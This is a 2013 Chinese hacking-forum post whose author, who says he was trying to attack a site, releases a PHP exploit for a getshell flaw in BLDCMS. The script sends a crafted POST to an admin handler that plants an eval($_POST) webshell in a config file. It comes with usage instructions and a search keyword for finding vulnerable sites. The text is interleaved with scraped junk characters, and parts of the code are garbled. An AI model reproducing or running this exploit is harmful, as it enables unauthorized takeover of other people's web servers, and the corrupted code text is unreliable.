之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞! ^4 g5 D; q/ }& m" |* Y$ }
* c! G" e' \( L2 X; I: [% c1 Y
* ^) w& ~* m/ x9 w D$ e
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
" @; g; M3 b2 Q " _ g# H! m# q5 ]/ \8 B3 `
既然都有人发了 我就把我之前写好的EXP放出来吧, z( X5 e: }+ D1 Y, b0 q
7 `7 T' H4 u, \& X
view source print?01.php;">
4 b+ T$ \; _( j6 ?& m0 ]8 ^02.<!--?php
0 i* ^; E, N8 t/ J& i$ ^8 \ S, v03.echo "-------------------------------------------------------------------/ Q& }/ ], u$ D0 I M
04. ; Z6 v, Q1 ~$ S) w; ]" @
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
- G/ U6 x3 T8 z/ s2 `06. ( a3 R% C% W& b3 _, V; E
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun- a& i; P/ B2 o/ D0 u k
08.
# Y* f8 c i. H09.QQ:981009941\r\n 2013.3.21\r\n
W& a6 Y" K% M; Y" e) U, Z$ a10.
6 H r* ?2 e) A0 @- |' i B, M0 o11.
" ]% |9 Y# C) m+ j" s# e4 S/ Q/ H12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码4 d+ k ?' C. g2 x1 v
13.
" b7 X5 s6 G2 T. a14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
5 b2 B9 z6 f. O, m. Z15.
" ]$ Z, M; D9 |" K- V- u16.--------------------------------------------------------------------\r\n";" G$ K2 p7 u: H, H8 H
17.$url=$argv[1];
8 ~7 A, U6 @$ G5 D! q6 h18.$dir=$argv[2];# h9 ^) F$ T/ M6 R9 C! Y
19.$pass=$argv[3];) r0 R4 W7 J% d4 k" S0 e
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
9 |+ G. p$ ^5 X1 c* m0 c1 z5 o21.if (emptyempty($pass)||emptyempty($url))
( A- |- s4 W6 j# Y0 f* B0 M/ M- x22.{exit("请输入参数");}/ ]' r1 U r' Q) F) P i) p0 O1 a
23.else
' q ^/ i8 q- U% x5 n# d; K/ z24.{
' x5 ~: i- \: S( W* P. R25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev* i, g9 t% r# B$ z4 X1 p2 }& U
26.
/ V% R% X( E' A z0 f27.al;; z1 y' j$ ]4 x. I$ { h
28.$length = strlen($fuckdata);; r8 x( Z0 S5 k& [# v6 b
29.function getshell($url,$pass)- Q9 B, i+ g) Y; j3 \
30.{
) v; ?5 E+ K6 U1 N31.global $url,$dir,$pass,$eval,$length,$fuckdata;/ i3 U! T* E2 Y. u4 w
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";" z9 S1 |. d/ w' ?- u1 m& S
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";3 n I* h2 q& U' c' {. ?. M/ x
34.$header .= "User-Agent: MSIE\r\n";9 I) w& Z/ M9 a8 x
35.$header .= "Host:".$url."\r\n";
5 e- x @8 g( M8 |36.$header .= "Content-Length: ".$length."\r\n";
0 h: ? R$ M0 P) d37.$header .= "Connection: Close\r\n";
: a) }, D, N& f( J9 N4 W! v5 T5 \38.$header .="\r\n";
8 R) T* @5 V; w# o; Z39.$header .= $fuckdata."\r\n\r\n";
5 u: X& t8 z1 S: @5 v40.$fp = fsockopen($url, 80,$errno,$errstr,15);
% s* ^+ P3 {& B4 T7 e1 H41.if (!$fp)
, J6 g% l: V0 K: n d( }% T; d: f42.{
1 l1 i8 y) ~$ c8 o43.exit ("利用失败:请检查指定目标是否能正常打开");
3 u, y2 f! w% _: a' n B44.}
( X ~5 y. A2 Q7 H45.else{ if (!fputs($fp,$header))# T$ T8 D( n' i
46.{exit ("利用失败");}
# O" Z& j$ f# ?" v5 F47.else% v& Z0 [8 @& O
48.{
# U, O% `* O R8 _+ g( K49.$receive = '';
' K+ o9 w5 {7 a50.while (!feof($fp)) {
! A4 k' U* @) ~3 @1 D% l; e51.$receive .= @fgets($fp, 1000);* }' F& g: N" P) `* L- c* u
52.}8 c+ Q }& s$ D, @# _/ Q5 H4 g5 D
53.@fclose($fp);; s4 Q4 q+ |+ A1 N) s! |( J
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标) n+ |: m/ w0 s A& |
55. " f1 F" ~ g C' O5 g5 L: Y' }( C
56.GPC是否=off)";
2 `2 Q( O8 V* z" ~9 }57.}}
9 w( ~% Z" L! B- L. m9 M58.}% u7 b p4 ?8 }! q, D/ D
59.}4 W2 @! V8 }6 f8 I$ ^9 ]
60.getshell($url,$pass);
! A, {' o/ n& r6 i) m) y2 g# d3 C61.?-->
O% m" j" l' ~* [0 ^# ~ 0 `' m9 r. J- g. U4 s, W v; P) }
6 L7 ?: v& Y( Q6 ?, ~ ' c& P* L2 l8 [0 R8 s" t
by 数据流
C. w" s9 K' ]7 a7 t- T |
发表于 2013-3-26 20:49:10
收藏
分享
支持
反对